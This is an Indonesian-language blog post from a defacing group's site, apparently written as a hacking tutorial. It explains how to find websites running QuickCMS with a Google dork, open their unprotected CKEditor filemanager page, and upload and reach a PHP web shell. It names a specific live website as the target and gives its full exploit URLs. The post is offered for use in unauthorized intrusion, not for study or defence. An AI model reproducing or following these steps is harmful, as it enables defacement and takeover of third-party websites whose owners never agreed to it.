Header Ads

Home > Defacing > Tutorial Deface Filemanager Di QuickCMS

Tutorial Deface Filemanager Di QuickCMS

Thursday, October 26, 2017
Setelah ditelusuri kini saya menemukan bug pada Website yang memakai QuickCMS .
Google dork : "CMS by Quick.Cms - Designed by BITIS & BELLA BITIS" site:use ur brain

Exploit : site.com/plugins/ckeditor/filemanager/bitis.html
Location file : /plugins/ckeditor/filemanager/[path]/shell.php

Step : 

1. Dorking menggunakan dork diatas  .
2. Pilih salah satu target .
 -Live target fresh : http://duroyaumedholi.eu/
3. Langsung saja masukkan exploit nya dan akan tampil Filemanager dari QuickCMS ini 
    Lihat  gambar dibawah . (http://duroyaumedholi.eu//plugins/ckeditor/filemanager/bitis.html)


4. Tinggal Upload shell kalian tanpa pusing membypass extensi nya langsung saja upload
    shell.php
5. Akses http://duroyaumedholi.eu//plugins/ckeditor/filemanager/files/nazwij_folder/shell.php

Thank you for Black Illusion Security <3
x404.hz - JBRXXX  - MHR27 - Mr.W42N 1D - 5AR!US4D - Gboys_flush - Raka_3rOOt - XenUx_404 - grey

Thank you for all defacer indonesia for u support ...

Author : ./Mr.Rtp007


Post a Comment

No comments

Silahkan Komentar dengan bahasa yang sopan

Subscribe to: Post Comments ( Atom )
Powered by Blogger.